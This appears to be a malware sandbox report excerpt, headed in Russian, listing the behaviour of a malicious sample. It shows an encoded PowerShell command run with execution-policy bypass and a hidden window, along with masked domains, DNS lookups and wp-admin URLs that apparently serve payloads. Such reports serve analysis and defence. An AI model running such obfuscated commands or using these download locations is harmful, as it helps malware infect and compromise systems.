Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -e JABFAFoAYgBSADQASgBVAD0AJwBWADkAMQA2AEYAZAAnADsAJABNAF8AWQBsAFgAegAgAD0AIAAnADIANAAyACcAOwAkAGMAMgBZAHQAMABhAD0AJwBKAHYAUABvADUAcQB0AE0AJwA7ACQATwBoAGoATAB...
- 'na#####purwodadi.com':80
- 'na#####purwodadi.com':443
- 'ra#######apa.000webhostapp.com':80
- 'bl##.theodo.com':443
- 'ce#######ami.000webhostapp.com':80
- 'te##cty.com':80
- http://na#####purwodadi.com/wp-admin/di6uf124/
- http://ra#######apa.000webhostapp.com/wp-admin/wqtfa644/
- http://ce#######ami.000webhostapp.com/wp-admin/v925167/
- http://te##cty.com/new/2pec5ek2759/
- 'na#####purwodadi.com':443
- 'bl##.theodo.com':443
- DNS ASK na#####purwodadi.com
- DNS ASK ra#######apa.000webhostapp.com
- DNS ASK bl##.theodo.com
- DNS ASK ce#######ami.000webhostapp.com
- DNS ASK te##cty.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -e JABFAFoAYgBSADQASgBVAD0AJwBWADkAMQA2AEYAZAAnADsAJABNAF8AWQBsAFgAegAgAD0AIAAnADIANAAyACcAOwAkAGMAMgBZAHQAMABhAD0AJwBKAHYAUABvADUAcQB0AE0AJwA7ACQATwBoAGoATAB...' (со скрытым окном)